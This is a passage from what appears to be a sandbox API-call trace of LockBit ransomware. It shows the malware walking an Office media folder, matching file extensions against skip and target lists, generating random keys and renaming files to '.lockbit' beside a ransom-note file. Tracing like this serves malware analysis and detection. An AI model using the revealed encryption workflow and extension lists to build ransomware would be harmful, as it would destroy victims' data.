[0204.214] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21312_.GIF") returned 1 [0204.214] lstrcmpiW (lpString1="ntldr", lpString2="BD21312_.GIF") returned 1 [0204.214] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21312_.GIF") returned 1 [0204.214] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21312_.GIF") returned 1 [0204.214] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21312_.GIF") returned -1 [0204.214] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21312_.GIF") returned 1 [0204.214] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21312_.GIF") returned 1 [0204.214] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.214] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21312_.GIF") returned=".GIF" [0204.214] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.214] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.214] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.214] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.215] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.215] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.215] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.215] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.215] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.215] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.215] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.215] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.215] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.215] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.215] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.215] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.215] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.215] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.215] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.215] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.215] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.215] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.215] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.215] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.215] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.215] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.215] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.215] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21312_.GIF.lockbit") returned 78 [0204.215] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21312_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21312_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.216] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.216] malloc (_Size=0x40068) returned 0x3df0008 [0204.216] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=257) returned 1 [0204.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.217] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.220] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21312_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21312_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.220] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.220] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.220] free (_Block=0x1fa2ed8) [0204.220] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21312_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.220] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.220] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.221] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38afa700, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd7c980, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x38afa700, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x45, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21314_.GIF", cAlternateFileName="")) returned 1 [0204.221] lstrcmpiW (lpString1=".", lpString2="BD21314_.GIF") returned -1 [0204.221] lstrcmpiW (lpString1="..", lpString2="BD21314_.GIF") returned -1 [0204.221] PathFindExtensionW (pszPath="BD21314_.GIF") returned=".GIF" [0204.221] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.221] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.221] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.221] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.221] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.221] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.221] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.221] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.221] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.221] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.221] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.221] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.221] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.221] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.221] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.222] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21314_.GIF") returned 1 [0204.222] lstrcmpiW (lpString1="ntldr", lpString2="BD21314_.GIF") returned 1 [0204.222] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21314_.GIF") returned 1 [0204.222] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21314_.GIF") returned 1 [0204.222] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21314_.GIF") returned -1 [0204.222] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21314_.GIF") returned 1 [0204.222] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21314_.GIF") returned 1 [0204.222] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.222] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21314_.GIF") returned=".GIF" [0204.222] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.222] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.222] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.222] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.223] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.223] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.223] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.223] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.223] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.223] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.223] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.223] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.223] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.223] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.223] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.223] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.223] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.223] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.223] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.223] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.223] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.223] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.223] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.223] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.223] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.223] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.223] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.223] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21314_.GIF.lockbit") returned 78 [0204.223] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21314_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21314_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.225] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.225] malloc (_Size=0x40068) returned 0x3df0008 [0204.225] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=69) returned 1 [0204.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.226] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.226] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.226] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.227] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.230] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21314_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21314_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.230] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.230] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.231] free (_Block=0x1fa2ed8) [0204.231] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21314_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.231] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.231] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.231] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33eaf300, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd7c980, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x33eaf300, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x113, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21316_.GIF", cAlternateFileName="")) returned 1 [0204.231] lstrcmpiW (lpString1=".", lpString2="BD21316_.GIF") returned -1 [0204.231] lstrcmpiW (lpString1="..", lpString2="BD21316_.GIF") returned -1 [0204.231] PathFindExtensionW (pszPath="BD21316_.GIF") returned=".GIF" [0204.231] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.231] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.231] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.231] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.231] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.231] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.231] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.231] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.231] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.231] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.231] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.231] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.231] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.231] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.232] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.232] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.232] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.232] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.232] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.232] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.232] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.233] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.233] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.233] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.233] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.233] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.233] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.233] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.233] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21316_.GIF") returned 1 [0204.233] lstrcmpiW (lpString1="ntldr", lpString2="BD21316_.GIF") returned 1 [0204.233] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21316_.GIF") returned 1 [0204.233] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21316_.GIF") returned 1 [0204.233] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21316_.GIF") returned -1 [0204.233] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21316_.GIF") returned 1 [0204.233] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21316_.GIF") returned 1 [0204.233] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.233] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21316_.GIF") returned=".GIF" [0204.233] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.233] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.233] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.233] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.233] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.233] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.233] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.233] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.233] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.234] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.234] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.234] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.234] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.234] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.234] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.234] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.234] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.234] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.234] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.234] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.234] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.234] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.234] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.234] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.234] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.234] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.234] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.234] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.234] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21316_.GIF.lockbit") returned 78 [0204.234] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21316_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21316_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.236] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.236] malloc (_Size=0x40068) returned 0x3df0008 [0204.236] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=275) returned 1 [0204.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.236] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.237] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.242] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21316_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21316_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.242] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.242] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.242] free (_Block=0x1fa2ed8) [0204.242] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21316_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.242] 